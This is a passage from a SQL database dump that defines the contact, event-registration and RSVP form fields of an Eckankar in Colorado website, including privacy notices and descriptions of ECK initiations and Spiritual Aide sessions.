class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Webmaster Contact Form</span></span></span></strong></span></h3>\r\nIf you have feedback about our website or would like to report a website issue, just fill out the form below.\r\nPlease be as descriptive as possible and provide details so that we can track down and address the problem.','',0x00),(276,'First Name','textbox_322','textbox',25,'2022-09-21 22:53:09',NULL,'First Name','textbox_322',2,0x01,'','above',0x00),(277,'Last Name','lastname_323','lastname',25,'2022-09-21 22:53:09',NULL,'Last Name','lastname_323',3,0x01,'','above',0x01),(278,'Email','email_324','email',25,'2022-09-21 22:53:09',NULL,'Email','email_324',4,0x01,'','above',0x01),(279,'hr','hr_325','hr',25,'2022-09-21 22:53:09',NULL,'hr','hr_325',5,0x00,'','',0x00),(280,'Message Subject','textbox_326','textbox',25,'2022-09-21 22:53:09',NULL,'Message Subject','textbox_326',6,0x01,'','above',0x00),(281,'Enter Your Message Here','textarea_327','textarea',25,'2022-09-21 22:53:09',NULL,'Enter Your Message Here','textarea_327',7,0x01,'','above',0x00),(282,'Text','html_328','html',25,'2022-09-21 22:53:09',NULL,'Text','html_328',8,0x00,'<b>Your email address and other information will not be shared with any third parties for any reason. It will only be used to respond to your request.</b>','',0x00),(284,'Submit','submit_330','submit',25,'2022-09-21 22:53:09',NULL,'Submit','submit_330',10,0x00,'','',0x00),(285,'Text','html_93','html',32,'2022-09-21 22:02:12',NULL,'Text','html_93',1,0x00,'<p></p>\n<p></p>\n<p></p>\n<h3><span style=\"color: #23507d;\"><strong>Central Colorado Initiator and ESA\'s</strong></span></h3>\n<strong>ECK Initiations</strong> link Soul directly to the ECK, Divine Spirit, for spiritual liberation in this lifetime. Each initiation is a sacred and joyous occasion for a spiritual seeker, for it brings an ever-increasing knowledge of and love for God. And it gives new insights into why certain things in your life play out as they do.<p></p>\n<p><strong>ECK Spiritual Aide</strong> sessions, though not counseling, can help you find your own answers in challenging situations through the personal guidance of Divine Spirit. The ESA session is conducted by an ECK Spiritual Aide, (ESA) who is an ECK cleric specially appointed and trained to offer this assistance. There are no fees for the above services, but donations to Eckankar are accepted. Because of the sacred nature of these events, the initiators and ESA\'s will call you instead of sending an email. A personal call ensures your privacy. If you have a pink slip for an ECK Initiation or would like to talk to an ECK Spiritual Aide, just select the person you would like to contact below.</p>','',0x00),(286,'First Name','textbox_94','textbox',32,'2022-09-21 22:02:12',NULL,'First Name','textbox_94',2,0x01,'','above',0x00),(287,'Last Name','lastname_95','lastname',32,'2022-09-21 22:02:12',NULL,'Last Name','lastname_95',3,0x01,'','above',0x01),(288,'Email','email_96','email',32,'2022-09-21 22:02:12',NULL,'Email','email_96',4,0x01,'','above',0x01),(289,'Phone','phone_97','phone',32,'2022-09-21 22:02:12',NULL,'Phone','phone_97',5,0x01,'','above',0x01),(290,'Your Local Area','listselect_98','listselect',32,'2022-09-21 22:02:12',NULL,'Your Local Area','listselect_98',6,0x01,'','above',0x00),(293,'Select The Person You Would Like To Contact','select_the_person_you_would_like_to_contact_1613166297230','listselect',32,'2022-09-21 22:02:12',NULL,'Select The Person You Would Like To Contact','select_the_person_you_would_like_to_contact_1613166297230',7,0x01,'','above',0x00),(294,'Enter Your Message Here','textarea_102','textarea',32,'2022-09-21 22:02:12',NULL,'Enter Your Message Here','textarea_102',8,0x01,'','above',0x00),(296,'Submit','submit_104','submit',32,'2022-09-21 22:02:12',NULL,'Submit','submit_104',10,0x00,'','',0x00),(297,'Name','name','textbox',33,'2019-09-21 02:24:29',NULL,'Name','name',1,0x01,'','above',0x00),(298,'Email','email','email',33,'2019-09-21 02:24:29',NULL,'Email','email',2,0x01,'','above',0x00),(299,'Message','message','textarea',33,'2019-09-21 02:24:29',NULL,'Message','message',3,0x01,'','above',0x00),(300,'Submit','submit','submit',33,'2019-09-21 02:24:29',NULL,'Submit','submit',5,0x00,NULL,NULL,0x00),(301,'Text','html_267','html',34,'2022-09-20 16:40:14',NULL,'Text','html_267',1,0x00,'<h3><span style=\"color: #23507d;\"><strong>Eckankar in Colorado<br>Youth and Families contact form</strong></span></h3>  <p>Please Enter Your Information Below</p>','',0x00),(302,'First Name','textbox_268','textbox',34,'2022-09-20 16:40:14',NULL,'First Name','textbox_268',2,0x01,'','above',0x00),(303,'Last Name','lastname_269','lastname',34,'2022-09-20 16:40:14',NULL,'Last Name','lastname_269',3,0x01,'','above',0x01),(304,'Email','email_270','email',34,'2022-09-20 16:40:14',NULL,'Email','email_270',4,0x01,'','above',0x01),(305,'hr','hr_273','hr',34,'2022-09-20 16:40:14',NULL,'hr','hr_273',5,0x00,'','',0x00),(306,'Message Subject','textbox_303','textbox',34,'2022-09-20 16:40:14',NULL,'Message Subject','textbox_303',6,0x01,'','above',0x00),(307,'Enter Your Message Here','textarea_276','textarea',34,'2022-09-20 16:40:14',NULL,'Enter Your Message Here','textarea_276',7,0x01,'','above',0x00),(308,'Text','html_305','html',34,'2022-09-20 16:40:14',NULL,'Text','html_305',8,0x00,'Your email address and other information will not be shared with any third parties for any reason. It will only be used to respond to your request.','',0x00),(310,'Submit','submit_278','submit',34,'2022-09-20 16:40:14',NULL,'Submit','submit_278',10,0x00,'','',0x00),(312,'First Name','textbox_268','textbox',35,'2022-09-20 16:43:23',NULL,'First Name','textbox_268',1,0x01,'','above',0x00),(313,'Last Name','lastname_269','lastname',35,'2022-09-20 16:43:23',NULL,'Last Name','lastname_269',2,0x01,'','above',0x01),(314,'Email','email_270','email',35,'2022-09-20 16:43:23',NULL,'Email','email_270',4,0x01,'','above',0x01),(315,'Message Subject','textbox_303','textbox',35,'2022-09-20 16:43:23',NULL,'Message Subject','textbox_303',5,0x01,'','above',0x00),(316,'Please Enter Your Message Here','please_enter_your_message_here_1599585729237','textarea',35,'2022-09-20 16:43:23',NULL,'Please Enter Your Message Here','please_enter_your_message_here_1599585729237',6,0x01,'','above',0x00),(317,'Text','html_305','html',35,'2022-09-21 22:06:23',NULL,'Text','html_305',7,0x00,'<div align=\"left\"><b>Your email address and other information will not be shared with any third parties for any reason. It will only be used to respond to your request.</b></div>','',0x00),(319,'Submit','submit_278','submit',35,'2022-09-20 16:43:23',NULL,'Submit','submit_278',9,0x00,'','',0x00),(333,'Phone','phone_1599585699152','phone',35,'2022-09-20 16:43:23',NULL,'Phone','phone_1599585699152',3,0x01,'','default',0x01),(352,'Text','html_267','html',38,'2021-04-24 20:07:19',NULL,'Text','html_267',0,0x00,'<h3><span style=\"color: #23507d;\"><strong>Eckankar in Colorado<br>Book Discussion Sign-up<br></strong></span></h3>  <p>Please Enter Your Information Below</p>','',0x00),(353,'First Name','textbox_268','textbox',38,'2020-12-08 23:42:53',NULL,'First Name','textbox_268',1,0x01,'','above',0x00),(354,'Last Name','lastname_269','lastname',38,'2020-12-08 23:42:53',NULL,'Last Name','lastname_269',2,0x01,'','above',0x01),(355,'Email','email_270','email',38,'2020-12-08 23:42:53',NULL,'Email','email_270',3,0x01,'','above',0x01),(356,'hr','hr_273','hr',38,'2020-12-08 23:42:53',NULL,'hr','hr_273',4,0x00,'','',0x00),(357,'Message Subject','textbox_303','textbox',38,'2020-12-08 23:42:53',NULL,'Message Subject','textbox_303',5,0x01,'','above',0x00),(358,'Enter Your Message Here','textarea_276','textarea',38,'2020-12-08 23:42:53',NULL,'Enter Your Message Here','textarea_276',6,0x01,'','above',0x00),(359,'Text','html_305','html',38,'2020-12-08 23:42:53',NULL,'Text','html_305',7,0x00,'Your email address and other information will not be shared with any third parties for any reason. It will only be used to respond to your request.','',0x00),(361,'Submit','submit_278','submit',38,'2020-12-08 23:42:53',NULL,'Submit','submit_278',9,0x00,'','',0x00),(362,'First Name','textbox_268','textbox',39,'2022-09-20 16:44:34',NULL,'First Name','textbox_268',1,0x01,'','above',0x00),(363,'Last Name','lastname_269','lastname',39,'2022-09-20 16:44:34',NULL,'Last Name','lastname_269',2,0x01,'','above',0x01),(364,'Email','email_270','email',39,'2022-09-20 16:44:34',NULL,'Email','email_270',4,0x01,'','above',0x01),(365,'Message Subject','textbox_303','textbox',39,'2022-09-20 16:44:34',NULL,'Message Subject','textbox_303',5,0x01,'','above',0x00),(366,'Please Enter Your Message Here','please_enter_your_message_here_1599585729237','textarea',39,'2022-09-20 16:44:34',NULL,'Please Enter Your Message Here','please_enter_your_message_here_1599585729237',6,0x01,'','above',0x00),(367,'Text','html_305','html',39,'2022-09-21 23:09:26',NULL,'Text','html_305',7,0x00,'<div align=\"left\"><b>Your email address and other information will not be shared with any third parties for any reason. It will only be used to respond to your request.</b></div>','',0x00),(369,'Submit','submit_278','submit',39,'2022-09-20 16:44:34',NULL,'Submit','submit_278',9,0x00,'','',0x00),(370,'Phone','phone_1599585699152','phone',39,'2022-09-20 16:44:34',NULL,'Phone','phone_1599585699152',3,0x01,'','default',0x01),(376,'Text','html_20','html',41,'2021-02-21 21:50:21',NULL,'Text','html_20',0,0x00,'<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Central Colorado / ECK Temple in Colorado Leadership Communications</span></span></span></strong></span></h3>\n','',0x00),(377,'First Name','textbox_21','textbox',41,'2021-02-21 21:50:21',NULL,'First Name','textbox_21',1,0x01,'','above',0x00),(378,'Last Name','lastname_22','lastname',41,'2021-02-21 21:50:21',NULL,'Last Name','lastname_22',2,0x01,'','above',0x01),(379,'Email','email_23','email',41,'2021-02-21 21:50:21',NULL,'Email','email_23',3,0x01,'','above',0x01),(380,'Phone','phone_24','phone',41,'2021-02-21 21:50:21',NULL,'Phone','phone_24',4,0x01,'','above',0x01),(381,'Your Local Area','listselect_25','listselect',41,'2021-02-21 21:50:21',NULL,'Your Local Area','listselect_25',5,0x01,'','above',0x00),(382,'hr','hr_26','hr',41,'2021-02-21 21:50:21',NULL,'hr','hr_26',6,0x00,'','',0x00),(383,'Colorado Leadership Positions','html_27','html',41,'2021-02-21 21:50:21',NULL,'Colorado Leadership Positions','html_27',7,0x00,'<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Colorado Leadership Positions</span></span></span></strong></span></h3>','',0x00),(384,'Select the person you would like to email','listselect_28','listselect',41,'2021-02-21 21:50:21',NULL,'Select the person you would like to email','listselect_28',8,0x01,'','above',0x00),(385,'Enter Your Message Here','textarea_29','textarea',41,'2021-02-21 21:50:21',NULL,'Enter Your Message Here','textarea_29',9,0x01,'','above',0x00),(659,'Text','html_141','html',62,'2023-07-04 16:22:26',NULL,'Text','html_141',1,0x00,'<p></p><p></p><p></p><h3><span style=\"color: #23507d;\"><strong>Loveland Initiator and ESA\'s</strong></span></h3><strong>ECK Initiations</strong> link Soul directly to the ECK, Divine Spirit, for spiritual liberation in this lifetime. Each initiation is a sacred and joyous occasion for a spiritual seeker, for it brings an ever-increasing knowledge of and love for God. And it gives new insights into why certain things in your life play out as they do.<p></p><p><strong>ECK Spiritual Aide</strong> sessions, though not counseling, can help you find your own answers in challenging situations through the personal guidance of Divine Spirit. The ESA session is conducted by an ECK Spiritual Aide, (ESA) who is an ECK cleric specially appointed and trained to offer this assistance. There are no fees for the above services, but donations to Eckankar are accepted. Because of the sacred nature of these events, the initiators and ESA\'s will call you instead of sending an email. A personal call ensures your privacy. If you have a pink slip for an ECK Initiation or would like to talk to an ECK Spiritual Aide, just select the person you would like to contact below.</p>','',0x00),(387,'Submit','submit_31','submit',41,'2021-02-21 21:50:21',NULL,'Submit','submit_31',11,0x00,'','',0x00),(388,'Register For This Event','register_for_this_event_1614289627888','html',42,'2021-02-25 21:47:14',NULL,'Register For This Event','register_for_this_event_1614289627888',1,0x00,'<p>After registration, you will receive event login information via email.</p>','',0x00),(389,'Divider','hr','hr',42,'2021-02-25 21:31:14',NULL,'Divider','hr',2,0x00,'','',0x00),(390,'First Name','firstname','firstname',42,'2021-02-25 18:56:33',NULL,'First Name','firstname',3,0x01,'','default',0x01),(391,'Last Name','lastname','lastname',42,'2021-02-25 18:56:33',NULL,'Last Name','lastname',4,0x01,'','default',0x01),(392,'Email','email','email',42,'2021-02-25 18:56:33',NULL,'Email','email',5,0x01,'','default',0x01),(393,'Register','register','submit',42,'2021-02-25 21:31:14',NULL,'Register','register',13,0x00,'','',0x00),(400,'Sound of Soul Zoom Registration','sound_of_soul_zoom_registration_1617130354644','html',44,'2021-04-22 17:59:49',NULL,'Sound of Soul Zoom Registration','sound_of_soul_zoom_registration_1617130354644',1,0x00,'<p style=\"font-size: 23px; margin-bottom: -10px !important; color:#23507D;font-weight:strong;\">Sound of Soul Event Registration</p>\n<p style=\"font-size: 16px; margin-bottom: -10px !important; color:#333333;font-weight:strong;\">After registration, you will receive event login information via email.<br></p>','',0x00),(401,'Divider','hr','hr',44,'2021-03-28 20:09:00',NULL,'Divider','hr',2,0x00,'','',0x00),(402,'First Name','firstname','firstname',44,'2021-03-28 20:04:28',NULL,'First Name','firstname',3,0x01,'','default',0x01),(403,'Last Name','lastname','lastname',44,'2021-03-28 20:04:28',NULL,'Last Name','lastname',4,0x01,'','default',0x01),(404,'Email','email','email',44,'2021-03-28 20:04:28',NULL,'Email','email',5,0x01,'','default',0x01),(405,'Submit','submit_1618628929218','submit',44,'2021-04-17 03:08:58',NULL,'Submit','submit_1618628929218',9,0x00,'','',0x00),(413,'','your_email_address_and_other_information_will_not_be_shared_with_any_third_parties_for_any_reason_it_will_only_be_used_to_respond_to_your_request_1617158441662','html',44,'2021-03-31 02:41:05',NULL,'','your_email_address_and_other_information_will_not_be_shared_with_any_third_parties_for_any_reason_it_will_only_be_used_to_respond_to_your_request_1617158441662',8,0x00,'<p>Your email address and other information will not be shared with any third parties for any reason. It will only be used to respond to your request.<br></p>','',0x00),(422,'ECK Light and Sound Service Registration','eck_light_and_sound_service_registration_1620150522553','html',46,'2021-05-04 18:11:01',NULL,'ECK Light and Sound Service Registration','eck_light_and_sound_service_registration_1620150522553',1,0x00,'<p style=\"font-size: 23px; margin-bottom: -10px !important; color:#23507D;font-weight:strong;\">ECK Light and Sound Service Registration</p><p style=\"font-size: 16px; margin-bottom: -10px !important; color:#333333;font-weight:strong;\">After registration, you will receive event login information via email.<br></p>','',0x00),(423,'','your_email_address_and_other_information_will_not_be_shared_with_any_third_parties_for_any_reason_it_will_only_be_used_to_respond_to_your_request_1617158441662','html',46,'2021-05-04 17:48:03',NULL,'','your_email_address_and_other_information_will_not_be_shared_with_any_third_parties_for_any_reason_it_will_only_be_used_to_respond_to_your_request_1617158441662',8,0x00,'<p>Your email address and other information will not be shared with any third parties for any reason. It will only be used to respond to your request.<br></p>','',0x00),(424,'Divider','hr','hr',46,'2021-05-04 17:48:03',NULL,'Divider','hr',2,0x00,'','',0x00),(425,'First Name','firstname','firstname',46,'2021-05-04 17:48:03',NULL,'First Name','firstname',3,0x01,'','default',0x01),(426,'Last Name','lastname','lastname',46,'2021-05-04 17:48:03',NULL,'Last Name','lastname',4,0x01,'','default',0x01),(427,'Email','email','email',46,'2021-05-04 17:48:03',NULL,'Email','email',5,0x01,'','default',0x01),(428,'Submit','submit_1618628929218','submit',46,'2021-05-04 17:48:03',NULL,'Submit','submit_1618628929218',9,0x00,'','',0x00),(430,'Event Intro Description','event_intro_description','html',47,'2021-05-19 15:10:29',NULL,'Event Intro Description','event_intro_description',1,0x00,'<p>If you would like to take part in our event, please fill in your details in this Event Registration Form below and you will be automatically registered. Event registration must be completed at least seven (7) days prior to the event.</p>',NULL,0x00),(431,'Divider','hr','hr',47,'2021-05-19 15:10:29',NULL,'Divider','hr',2,0x00,NULL,NULL,0x00),(432,'First Name','firstname','firstname',47,'2021-05-19 15:10:29',NULL,'First Name','firstname',3,0x01,'','default',0x01),(433,'Last Name','lastname','lastname',47,'2021-05-19 15:10:29',NULL,'Last Name','lastname',4,0x01,'','default',0x01),(434,'Email','email','email',47,'2021-05-19 15:10:29',NULL,'Email','email',5,0x01,'','default',0x01),(435,'Phone','textbox','textbox',47,'2021-05-19 15:10:29',NULL,'Phone','textbox',6,0x01,'','default',0x00),(436,'Divider','hr_1','hr',47,'2021-05-19 15:10:29',NULL,'Divider','hr_1',7,0x00,NULL,NULL,0x00),(437,'How many friends will you bring along?','how_many_friends_will_you_bring_along','listselect',47,'2021-05-19 15:10:29',NULL,'How many friends will you bring along?','how_many_friends_will_you_bring_along',8,0x01,NULL,'default',0x00),(438,'Any food requirements?','any_food_requirements','listradio',47,'2021-05-19 15:10:29',NULL,'Any food requirements?','any_food_requirements',9,0x01,NULL,'default',0x00),(439,'Preferred drink?','preferred_drink','listradio',47,'2021-05-19 15:10:29',NULL,'Preferred drink?','preferred_drink',10,0x01,NULL,'default',0x00),(440,'Divider','hr_2','hr',47,'2021-05-19 15:10:29',NULL,'Divider','hr_2',11,0x00,NULL,NULL,0x00),(441,'HTML','html','html',47,'2021-05-19 15:10:29',NULL,'HTML','html',12,0x00,'<p>Below, you can find a map of the event venue.<br>\nPlease contact us for any further details</p>\n\n\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3105.150199370797!2d-77.03871848503316!3d38.897680454533216!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x89b7b7bcdecbb1df%3A0x715969d86d0b76bf!2sThe+White+House!5e0!3m2!1sen!2sus!4v1472415172562\" width=\"600\" height=\"450\" frameborder=\"0\" style=\"border:0\" allowfullscreen=\"\" title=\"Event Location\"></iframe>',NULL,0x00),(442,'Register','register','submit',47,'2021-05-19 15:10:29',NULL,'Register','register',13,0x00,NULL,NULL,0x00),(443,'Book Discussion Registration -Autobiography of a Modern Prophet','book_discussion_registration_-autobiography_of_a_modern_prophet_1621437234063','html',48,'2021-05-19 15:50:38',NULL,'Book Discussion Registration -Autobiography of a Modern Prophet','book_discussion_registration_-autobiography_of_a_modern_prophet_1621437234063',1,0x00,'<p style=\"font-size: 23px; margin-bottom: -10px !important; color:#23507D;font-weight:strong;\">Book Discussion Registration -Autobiography of a Modern Prophet</p><p style=\"font-size: 16px; margin-bottom: -10px !important; color:#333333;font-weight:strong;\">After registration, you will receive event login information via email.<br></p>','',0x00),(444,'','your_email_address_and_other_information_will_not_be_shared_with_any_third_parties_for_any_reason_it_will_only_be_used_to_respond_to_your_request_1617158441662','html',48,'2021-05-19 15:12:04',NULL,'','your_email_address_and_other_information_will_not_be_shared_with_any_third_parties_for_any_reason_it_will_only_be_used_to_respond_to_your_request_1617158441662',8,0x00,'<p>Your email address and other information will not be shared with any third parties for any reason. It will only be used to respond to your request.<br></p>','',0x00),(445,'Divider','hr','hr',48,'2021-05-19 15:12:04',NULL,'Divider','hr',2,0x00,'','',0x00),(446,'First Name','firstname','firstname',48,'2021-05-19 15:12:04',NULL,'First Name','firstname',3,0x01,'','default',0x01),(447,'Last Name','lastname','lastname',48,'2021-05-19 15:12:04',NULL,'Last Name','lastname',4,0x01,'','default',0x01),(448,'Email','email','email',48,'2021-05-19 15:12:04',NULL,'Email','email',5,0x01,'','default',0x01),(449,'Submit','submit_1618628929218','submit',48,'2021-05-19 15:12:04',NULL,'Submit','submit_1618628929218',9,0x00,'','',0x00),(450,'First Name','textbox_268','textbox',49,'2022-09-20 16:44:10',NULL,'First Name','textbox_268',1,0x01,'','above',0x00),(451,'Last Name','lastname_269','lastname',49,'2022-09-20 16:44:10',NULL,'Last Name','lastname_269',2,0x01,'','above',0x01),(452,'Email','email_270','email',49,'2022-09-20 16:44:10',NULL,'Email','email_270',4,0x01,'','above',0x01),(453,'Message Subject','textbox_303','textbox',49,'2022-09-20 16:44:10',NULL,'Message Subject','textbox_303',5,0x01,'','above',0x00),(454,'Please Enter Your Message Here','please_enter_your_message_here_1599585729237','textarea',49,'2022-09-20 16:44:10',NULL,'Please Enter Your Message Here','please_enter_your_message_here_1599585729237',6,0x01,'','above',0x00),(455,'Text','html_305','html',49,'2022-09-21 23:08:57',NULL,'Text','html_305',7,0x00,'<div align=\"left\"><b>Your email address and other information will not be shared with any third parties for any reason. It will only be used to respond to your request.</b></div>','',0x00),(457,'Submit','submit_278','submit',49,'2022-09-20 16:44:10',NULL,'Submit','submit_278',9,0x00,'','',0x00),(458,'Phone','phone_1599585699152','phone',49,'2022-09-20 16:44:10',NULL,'Phone','phone_1599585699152',3,0x01,'','default',0x01),(459,'First Name','firstname_1523910710496','firstname',50,'2021-07-08 14:47:21',NULL,'First Name','firstname_1523910710496',1,0x00,'','default',0x00),(460,'Last Name','lastname_1523910710972','lastname',50,'2021-07-08 14:47:21',NULL,'Last Name','lastname_1523910710972',2,0x00,'','default',0x00),(461,'Email','email_1523910925640','email',50,'2021-07-08 14:47:21',NULL,'Email','email_1523910925640',3,0x00,'','default',0x00),(462,'Email Confirmation','email_confirmation_1523911122242','confirm',50,'2021-07-08 14:47:21',NULL,'Email Confirmation','email_confirmation_1523911122242',4,0x00,'','default',0x00),(463,'Gender Identification','gender_identification_1523910801816','textbox',50,'2021-07-08 14:47:21',NULL,'Gender Identification','gender_identification_1523910801816',5,0x00,'','default',0x00),(464,'Age','age_1523910843594','listradio',50,'2021-07-08 14:47:21',NULL,'Age','age_1523910843594',6,0x00,NULL,'default',0x00),(465,'Question 1','question_1_1523910940120','listselect',50,'2021-07-08 14:47:21',NULL,'Question 1','question_1_1523910940120',7,0x00,NULL,'default',0x00),(466,'Question 2','question_2_1523910945938','listselect',50,'2021-07-08 14:47:21',NULL,'Question 2','question_2_1523910945938',8,0x00,NULL,'default',0x00),(467,'Question 3','question_3_1523910957654','listradio',50,'2021-07-08 14:47:21',NULL,'Question 3','question_3_1523910957654',9,0x00,NULL,'default',0x00),(468,'Question 4','question_4_1523910969934','textbox',50,'2021-07-08 14:47:21',NULL,'Question 4','question_4_1523910969934',10,0x00,'','default',0x00),(469,'Question 5','question_5_1523910981688','textarea',50,'2021-07-08 14:47:21',NULL,'Question 5','question_5_1523910981688',11,0x00,'','default',0x00),(470,'Submit','submit_1523910734890','submit',50,'2021-07-08 14:47:21',NULL,'Submit','submit_1523910734890',12,0x00,NULL,NULL,0x00),(471,'Loveland - Book Discussion Registration -Autobiography of a Modern Prophet','loveland_-_book_discussion_registration_-autobiography_of_a_modern_prophet_1630271086284','html',51,'2021-08-29 21:05:00',NULL,'Loveland - Book Discussion Registration -Autobiography of a Modern Prophet','loveland_-_book_discussion_registration_-autobiography_of_a_modern_prophet_1630271086284',1,0x00,'<p style=\"font-size: 23px; margin-bottom: -10px !important; color:#23507D;font-weight:strong;\">Loveland - Book Discussion Registration -Autobiography of a Modern Prophet</p><p style=\"font-size: 16px; margin-bottom: -10px !important; color:#333333;font-weight:strong;\">After registration, you will receive event login information via email.<br></p>','',0x00),(472,'','your_email_address_and_other_information_will_not_be_shared_with_any_third_parties_for_any_reason_it_will_only_be_used_to_respond_to_your_request_1617158441662','html',51,'2021-08-29 19:58:19',NULL,'','your_email_address_and_other_information_will_not_be_shared_with_any_third_parties_for_any_reason_it_will_only_be_used_to_respond_to_your_request_1617158441662',8,0x00,'<p>Your email address and other information will not be shared with any third parties for any reason. It will only be used to respond to your request.<br></p>','',0x00),(473,'Divider','hr','hr',51,'2021-08-29 19:58:19',NULL,'Divider','hr',2,0x00,'','',0x00),(474,'First Name','firstname','firstname',51,'2021-08-29 19:58:19',NULL,'First Name','firstname',3,0x01,'','default',0x01),(475,'Last Name','lastname','lastname',51,'2021-08-29 19:58:19',NULL,'Last Name','lastname',4,0x01,'','default',0x01),(476,'Email','email','email',51,'2021-08-29 19:58:19',NULL,'Email','email',5,0x01,'','default',0x01),(477,'Submit','submit_1618628929218','submit',51,'2021-08-29 19:58:19',NULL,'Submit','submit_1618628929218',9,0x00,'','',0x00),(495,'Text','html_201','html',53,'2022-09-20 16:36:18',NULL,'Text','html_201',1,0x00,'<h3><span style=\"color: #23507d;font-size: 28px;text-transform: capitalize;\">Add/Update Email or Mailing Address</span></h3><p style=\"padding-left: 30px;\"><strong><span style=\"color: #000000;font-size: 22px;\"><br>Your Information Is Safe</span></strong></p><p style=\"padding-left: 30px; font-size:18px;\">We will never share your personal information with anyone. Your email address and any other information you give us will be held securely and only used to communicate regarding Eckankar in Colorado events or news.</p>','',0x00),(496,'First Name','textbox_202','textbox',53,'2022-09-20 16:36:18',NULL,'First Name','textbox_202',2,0x01,'','above',0x00),(497,'Last Name','lastname_203','lastname',53,'2022-09-20 16:36:18',NULL,'Last Name','lastname_203',3,0x01,'','above',0x01),(498,'Phone','phone_205','phone',53,'2022-09-20 16:36:18',NULL,'Phone','phone_205',4,0x00,'','above',0x01),(499,'Email    (please fill in if adding or updating email)','email_204','email',53,'2022-09-20 16:36:18',NULL,'Email    (please fill in if adding or updating email)','email_204',5,0x00,'','above',0x01),(500,'Street Address (add or update mailing address)','street_address_add_or_update_mailing_address_1616603898544','address',53,'2022-09-20 16:36:18',NULL,'Street Address (add or update mailing address)','street_address_add_or_update_mailing_address_1616603898544',6,0x00,'','above',0x01),(501,'City','city_216','city',53,'2022-09-20 16:36:18',NULL,'City','city_216',7,0x00,'','above',0x00),(502,'State','listselect_218','listselect',53,'2022-09-20 16:36:18',NULL,'State','listselect_218',8,0x00,'','above',0x00),(503,'Country','listcountry_219','listcountry',53,'2022-09-20 16:36:18',NULL,'Country','listcountry_219',9,0x00,'US','above',0x00),(504,'hr','hr_207','hr',53,'2022-09-20 16:36:18',NULL,'hr','hr_207',10,0x00,'','',0x00),(505,'If You Have Comments To Add - Please Enter Them Here','textarea_210','textarea',53,'2022-09-20 16:36:18',NULL,'If You Have Comments To Add - Please Enter Them Here','textarea_210',11,0x00,'','above',0x00),(507,'Submit','submit_212','submit',53,'2022-09-20 16:36:18',NULL,'Submit','submit_212',13,0x00,'','',0x00),(508,'Statewide Satsang Intensive Registration','statewide_satsang_intensive_registration_1646235944769','html',54,'2022-03-02 15:46:11',NULL,'Statewide Satsang Intensive Registration','statewide_satsang_intensive_registration_1646235944769',1,0x00,'<p style=\"font-size: 23px; margin-bottom: -10px !important; color:#23507D;font-weight:strong;\">Satsang Intensive Registration</p><p style=\"font-size: 16px; margin-bottom: -10px !important; color:#333333;font-weight:strong;\">After registration, you will receive event login information via email.<br></p>','',0x00),(509,'','your_email_address_and_other_information_will_not_be_shared_with_any_third_parties_for_any_reason_it_will_only_be_used_to_respond_to_your_request_1617158441662','html',54,'2022-03-02 15:44:18',NULL,'','your_email_address_and_other_information_will_not_be_shared_with_any_third_parties_for_any_reason_it_will_only_be_used_to_respond_to_your_request_1617158441662',8,0x00,'<p>Your email address and other information will not be shared with any third parties for any reason. It will only be used to respond to your request.<br></p>','',0x00),(510,'Divider','hr','hr',54,'2022-03-02 15:44:18',NULL,'Divider','hr',2,0x00,'','',0x00),(511,'First Name','firstname','firstname',54,'2022-03-02 15:44:18',NULL,'First Name','firstname',3,0x01,'','default',0x01),(512,'Last Name','lastname','lastname',54,'2022-03-02 15:44:18',NULL,'Last Name','lastname',4,0x01,'','default',0x01),(513,'Email','email','email',54,'2022-03-02 15:44:18',NULL,'Email','email',5,0x01,'','default',0x01),(514,'Submit','submit_1618628929218','submit',54,'2022-03-02 15:44:18',NULL,'Submit','submit_1618628929218',9,0x00,'','',0x00),(515,'ECK Temple Beautify Day','eck_temple_beautify_day_1649193811532','html',55,'2022-04-05 21:29:41',NULL,'ECK Temple Beautify Day','eck_temple_beautify_day_1649193811532',1,0x00,'<p style:\"font-size:18px;=\"\" color:#26507d;\"=\"\">Thanks for getting in touch with us about \'Beautify Day\' on May 14th at the ECK Temple!</p><p>If you would like more information or have questions about the event, just fill out the form below.<br></p>','',0x00),(516,'Divider','hr','hr',55,'2022-04-05 21:29:41',NULL,'Divider','hr',2,0x00,'','',0x00),(517,'First Name','firstname','firstname',55,'2022-04-05 21:16:08',NULL,'First Name','firstname',3,0x01,'','default',0x01),(518,'Last Name','lastname','lastname',55,'2022-04-05 21:16:08',NULL,'Last Name','lastname',4,0x01,'','default',0x01),(519,'Email','email','email',55,'2022-04-05 21:16:08',NULL,'Email','email',5,0x01,'','default',0x01),(520,'Phone','textbox','textbox',55,'2022-04-05 21:16:08',NULL,'Phone','textbox',6,0x01,'','default',0x00),(521,'Divider','hr_1','hr',55,'2022-04-05 21:29:41',NULL,'Divider','hr_1',7,0x00,'','',0x00),(525,'Divider','hr_2','hr',55,'2022-04-05 21:29:41',NULL,'Divider','hr_2',9,0x00,'','',0x00),(526,'HTML','html','html',55,'2022-04-05 21:29:41',NULL,'HTML','html',10,0x00,'<p>Your email address and other information will not be shared with any third parties for any reason. It will only be used to respond to your request. </p>','',0x00),(527,'Submit','submit_1649194061669','submit',55,'2022-04-05 21:29:41',NULL,'Submit','submit_1649194061669',11,0x00,'','',0x00),(528,'Let us know if you need more event information or have questions.','let_us_know_if_you_need_more_event_information_or_have_questions_1649193768671','textarea',55,'2022-04-05 21:29:41',NULL,'Let us know if you need more event information or have questions.','let_us_know_if_you_need_more_event_information_or_have_questions_1649193768671',8,0x01,'','default',0x00),(529,'Text','html_267','html',56,'2022-04-05 22:57:36',NULL,'Text','html_267',0,0x00,'<p></p><p></p><p style=\"color: #23507d; font-size:20px; font-weight:bold;\">RSVP for \'Beautify Day\' at the ECK Temple of Colorado<br>May 14th, 2022 <br></p>','',0x00),(530,'First Name','textbox_268','textbox',56,'2022-04-05 21:40:44',NULL,'First Name','textbox_268',1,0x01,'','above',0x00),(531,'Last Name','lastname_269','lastname',56,'2022-04-05 21:40:44',NULL,'Last Name','lastname_269',2,0x01,'','above',0x01),(532,'Email','email_270','email',56,'2022-04-05 21:40:44',NULL,'Email','email_270',3,0x01,'','above',0x01),(533,'hr','hr_273','hr',56,'2022-04-05 21:40:44',NULL,'hr','hr_273',4,0x00,'','',0x00),(535,'If you have a message, please enter it 